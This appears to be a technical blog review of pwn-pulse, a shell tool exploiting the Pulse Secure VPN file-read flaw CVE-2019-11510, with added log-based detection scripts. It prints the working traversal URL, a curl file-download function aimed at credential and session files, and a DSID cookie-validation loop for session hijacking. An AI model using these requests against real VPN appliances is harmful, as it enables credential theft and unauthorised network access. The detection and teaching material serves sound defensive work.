Inside pwn-pulse: A Surgical Shell Script for Pulse Secure VPN Exploitation

Hook

While most security tools chase complexity with Python frameworks and compiled binaries, one of the most effective VPN exploitation tools ever released fits in a single shell script you could read during a coffee break.

Context

In April 2019, security researcher Orange Tsai disclosed a pre-authentication arbitrary file read vulnerability in Pulse Connect Secure SSL VPN devices that would become one of the most consequential enterprise security incidents of that year. CVE-2019-11510 allowed unauthenticated attackers to read arbitrary files from affected devices simply by crafting malicious HTTP requests to specific endpoints. The vulnerability wasn't just theoretical—it exposed plaintext credentials, session tokens, and private keys on thousands of internet-facing VPN concentrators protecting corporate networks.

The impact was immediate and severe. Pulse Secure VPNs were deployed across Fortune 500 companies, government agencies, and critical infrastructure. Within weeks of the disclosure, mass scanning campaigns began. By the time patches rolled out in August 2019, attackers had already compromised numerous high-value targets. BishopFox's pwn-pulse emerged as a practical exploitation tool for security professionals who needed to rapidly assess their organization's exposure. Rather than building a complex framework, they created a focused bash script that did one thing exceptionally well: extract every piece of valuable data from a vulnerable Pulse Secure instance and identify which sessions could be immediately hijacked.

Technical Insight

[System architecture diagram (auto-generated): Pulse Secure VPN -> path traversal exploit (CVE-2019-11510 via curl) -> file downloads (/etc/passwd, /data/runtime/mtmp/system, /data/runtime/mtmp/lmdb, session cache files) -> text processing (grep/awk/sed) -> credential extraction (usernames & passwords, private keys, session cookies, admin details) -> session validation (test cookies) -> active sessions for hijacking]

The brilliance of pwn-pulse lies in its surgical approach to exploitation. The tool doesn't attempt to be a Swiss Army knife—it weaponizes CVE-2019-11510 through a carefully orchestrated sequence of file reads followed by intelligent parsing. The vulnerability itself stems from improper path sanitization in the Pulse Secure web interface. By sending requests to /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd, attackers could traverse directory structures and read arbitrary files. Pwn-pulse exploits this by targeting specific high-value files that Pulse Secure stores in predictable locations.

The core exploitation logic revolves around a simple but effective curl-based file download function:

# Fetch one file through the traversal path and save it locally.
# TARGET is assumed to be set earlier in the script to the host under assessment.
get_file() {
    local file=$1
    local output=$2
    curl -sk "https://${TARGET}/dana-na/../dana/html5acc/guacamole/../../../../../../${file}" \
         -o "${output}" 2>/dev/null

    # A zero-byte output file means the read did not succeed.
    if [ -s "${output}" ]; then
        echo "[+] Downloaded ${file}"
        return 0
    else
        echo "[-] Failed to download ${file}"
        return 1
    fi
}

This function demonstrates the vulnerability perfectly: the path traversal sequence ../dana/html5acc/guacamole/../../../../../../ breaks out of the web root, allowing access to the entire filesystem. The script then systematically targets files containing credentials, configuration data, and session information. The primary targets include /data/runtime/mtmp/system, /data/runtime/mtmp/lmdb/dataa/data.mdb, and /data/runtime/mtmp/lmdb/randomVal/data.mdb—files that contain cached authentication data, LDAP credentials, and active session tokens.
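Seen from the appliance's side, the request shape described in the two paragraphs above is also what a defender has to recognise in access logs: a path that carries `..` segments and, once resolved, no longer lies under the web interface. The following is an added example for this article, not code from pwn-pulse or from Pulse Secure. It percent-decodes each request target, resolves the path, and flags requests that escape the interface prefixes; the log format, addresses and response sizes are constructed, and treating `/dana-na/` and `/dana/` as the legitimate prefixes is an assumption taken from the paths the article itself quotes.

```python
"""Flag access-log requests whose resolved path escapes the Pulse web interface.

Added example for this article; not code from pwn-pulse or Pulse Secure.
Log format, IP addresses and sizes below are constructed for illustration.
"""
import re
from posixpath import normpath
from urllib.parse import unquote

# Common Log Format style line: ip ident user [time] "METHOD target PROTO" status size
ACCESS_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: legitimate traffic lives under the two interface prefixes the
# article's own examples use.
WEB_PREFIXES = ("/dana-na/", "/dana/")

# Constructed sample lines. Line 2 is the traversal path quoted in the article;
# line 3 carries the same idea with percent-encoded separators, which a plain
# substring match for "/../" would miss.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Aug/2019:10:01:02 +0000] "GET /dana-na/auth/welcome.cgi HTTP/1.1" 200 5120
203.0.113.7 - - [20/Aug/2019:10:01:09 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd HTTP/1.1" 200 1433
203.0.113.7 - - [20/Aug/2019:10:01:11 +0000] "GET /dana-na/..%2Fdana/html5acc/guacamole/..%2F..%2F..%2F..%2F..%2F..%2Fdata/runtime/mtmp/system HTTP/1.1" 200 8192
198.51.100.9 - - [20/Aug/2019:10:02:30 +0000] "GET /dana/home/index.cgi HTTP/1.1" 200 2048
"""


def decode_target(target):
    """Drop the query string and percent-decode twice to catch double encoding."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def analyze_path(target):
    """Count '..' segments, resolve the path, and decide whether it leaves the web prefixes."""
    path = decode_target(target)
    segments = [s for s in path.split("/") if s]
    dotdot = segments.count("..")
    # normpath collapses '..' and clamps at '/', mirroring what a filesystem does
    resolved = normpath("/" + "/".join(segments))
    escapes = dotdot > 0 and not resolved.startswith(WEB_PREFIXES)
    return {"path": path, "dotdot": dotdot, "resolved": resolved, "traversal": escapes}


def scan_access_log(text):
    """Return one finding per request whose resolved path escapes the web interface."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_LINE_RE.match(line)
        if not m:
            continue
        info = analyze_path(m.group("target"))
        if info["traversal"]:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "dotdot": info["dotdot"],
                "resolved": info["resolved"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"[!] {f['time']} {f['ip']} -> {f['resolved']} "
              f"(status {f['status']}, {f['dotdot']} '..' segments)")
```

The decision is made on the resolved path rather than on the presence of `..`, so a request that climbs out of one interface directory but lands back inside the other is reported only through its `dotdot` count, while anything that resolves to a system path such as `/etc/passwd` is flagged outright. The status code travels with each finding because, on an unpatched device, a 200 to such a request means the read succeeded.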

What separates pwn-pulse from a basic proof-of-concept is its parsing intelligence. After downloading target files, the script employs grep patterns and text processing to extract actionable intelligence. For session cookies, it searches for specific markers that indicate active sessions:

# Pull every DSID-shaped token out of the downloaded LMDB dump, de-duplicate,
# and try each one against the web interface.
grep -aoP 'DSID=[a-f0-9]{32}' lmdb_data.mdb | sort -u | while read -r session; do
    echo "[*] Testing session: ${session}"
    # Only the HTTP status code is kept; 200 means the cookie was accepted.
    response=$(curl -sk -o /dev/null -w "%{http_code}" \
              -H "Cookie: ${session}" \
              "https://${TARGET}/dana/home/index.cgi")

    if [ "${response}" = "200" ]; then
        echo "[+] VALID SESSION: ${session}"
        echo "${session}" >> valid_sessions.txt
    fi
done

This session validation loop transforms raw data extraction into an immediately exploitable attack vector. By testing each extracted DSID cookie against the Pulse Secure login portal, the tool identifies active sessions that an attacker could hijack without needing credentials. This is particularly devastating because VPN sessions often have extended timeouts, meaning a session extracted hours after initial authentication might still grant full network access.
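From the defender's side, the same DSID pattern the loop greps for can be turned around: a session cookie presented from a client address other than the one that first used it, and still answered with HTTP 200, is the footprint a hijacked session leaves in access records, and the gap between first use and the foreign presentation is where the extended-timeout problem becomes visible. The following is an added example for this article, not pwn-pulse's code. The flat record format, addresses and token values are constructed; a real appliance's logs differ and would need their own parser.

```python
"""Flag session cookies presented from more than one client address.

Added example for this article; not code from pwn-pulse or Pulse Secure.
The record format, IPs and token values below are constructed.
"""
import re
from datetime import datetime, timezone

# Same token shape the article's grep matches.
DSID_RE = re.compile(r"DSID=([a-f0-9]{32})")

# Constructed records: timestamp, client IP, cookie, method, path, status.
# Session 1 is used from 198.51.100.9, then accepted 5.5 hours later from a
# different address. Session 2 is presented from a foreign address but answered
# with a redirect, i.e. no longer accepted.
SAMPLE_RECORDS = """\
2019-08-20T08:00:00Z 198.51.100.9 DSID=0123456789abcdef0123456789abcdef GET /dana/home/index.cgi 200
2019-08-20T08:05:00Z 198.51.100.9 DSID=0123456789abcdef0123456789abcdef GET /dana/home/index.cgi 200
2019-08-20T13:30:00Z 203.0.113.7 DSID=0123456789abcdef0123456789abcdef GET /dana/home/index.cgi 200
2019-08-20T09:00:00Z 192.0.2.44 DSID=ffffffffffffffffffffffffffffffff GET /dana/home/index.cgi 200
2019-08-20T09:01:00Z 192.0.2.44 DSID=ffffffffffffffffffffffffffffffff GET /dana/home/index.cgi 200
2019-08-20T13:31:00Z 203.0.113.7 DSID=ffffffffffffffffffffffffffffffff GET /dana/home/index.cgi 302
"""


def parse_records(text):
    """Parse the constructed flat format into dicts, sorted by time."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, cookie, method, path, status = line.split()
        m = DSID_RE.search(cookie)
        if not m:
            continue  # records without a session cookie carry nothing to correlate
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "ip": ip,
            "dsid": m.group(1),
            "path": path,
            "status": int(status),
        })
    rows.sort(key=lambda r: r["ts"])
    return rows


def find_cross_ip_sessions(rows):
    """One finding per request that presents a DSID from an address other than the
    one that first used it. 'accepted' records whether the appliance answered 200,
    the same check the article's loop uses to call a cookie valid."""
    first_seen = {}
    findings = []
    for r in rows:
        origin = first_seen.setdefault(r["dsid"], r)
        if origin is r or r["ip"] == origin["ip"]:
            continue
        findings.append({
            "dsid": r["dsid"],
            "origin_ip": origin["ip"],
            "new_ip": r["ip"],
            "hours_since_first_use": (r["ts"] - origin["ts"]).total_seconds() / 3600,
            "accepted": r["status"] == 200,
        })
    return findings


if __name__ == "__main__":
    for f in find_cross_ip_sessions(parse_records(SAMPLE_RECORDS)):
        verdict = "ACCEPTED" if f["accepted"] else "rejected"
        print(f"[!] DSID {f['dsid'][:8]}... first used by {f['origin_ip']}, "
              f"presented by {f['new_ip']} {f['hours_since_first_use']:.1f}h later: {verdict}")
```

Only the accepted cross-address presentation is a likely hijack; the rejected one still tells an analyst that a cookie value has leaked, which on a device exposed to this vulnerability is worth a look at the file-read requests in the preceding hours.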

The tool's architecture also reveals thoughtful error handling and output management. Rather than dumping everything to stdout, pwn-pulse creates an organized directory structure for each target, storing raw files, parsed credentials, and validated sessions in separate files. This organization proves invaluable during actual penetration tests where you might be assessing dozens of targets and need to quickly identify which systems yielded exploitable results.

One particularly clever aspect is how the script handles binary data in the LMDB database files. These files contain a mix of binary data and plaintext strings. Instead of attempting complex binary parsing, pwn-pulse uses strings and grep to extract readable data, then applies regex patterns to identify credentials, API keys, and session tokens. This approach isn't elegant, but it's remarkably effective and requires no dependencies beyond standard Unix utilities available on any penetration testing distribution.

Gotcha

The most obvious limitation is temporal: CVE-2019-11510 was patched in August 2019, so for most modern infrastructure this tool is largely of historical interest. Any organization still running a vulnerable Pulse Connect Secure version has much larger security problems than a single unpatched VPN. During penetration tests, you'll find the tool useful primarily when assessing legacy systems or isolated networks with poor patch management, or when conducting red team exercises that simulate advanced persistent threats that maintain exploitation capabilities for years-old vulnerabilities.

The shell script implementation, while admirably portable, introduces practical limitations that become apparent at scale. The script processes files synchronously and relies heavily on text processing utilities that weren't designed for binary format parsing. When targeting Pulse Secure instances with large session databases or extensive configuration files, you'll encounter significant performance degradation. The grep-based parsing also produces false positives—random binary sequences occasionally match credential patterns, requiring manual verification of results. Additionally, the tool provides no rate limiting or request throttling, which can trigger intrusion detection systems or cause service disruptions if you're not careful. For large-scale assessment campaigns across hundreds of potential targets, you'd be better served by the Metasploit module or custom tooling with concurrent execution and more robust error handling.

Verdict

Use if: You're conducting authorized penetration tests against organizations with documented poor patch management, need a lightweight exploitation tool that runs on resource-constrained systems without Python or Ruby dependencies, or want to understand the practical mechanics of path traversal exploitation in enterprise VPN appliances. This tool excels in scenarios where you need rapid credential harvesting from a small number of known-vulnerable targets and want immediately interpretable results without complex framework configuration.

Skip if: Your assessment scope involves modern, well-maintained infrastructure where post-2019 patches are applied, you need to scan large IP ranges for vulnerable systems (use Nuclei or Metasploit's scanner instead), or you require comprehensive post-exploitation capabilities beyond credential theft and session hijacking. Also skip this if you're looking for a current threat—by 2024, CVE-2019-11510 represents ancient history in vulnerability terms, and its presence indicates systemic security failures beyond what a single exploit tool can address.
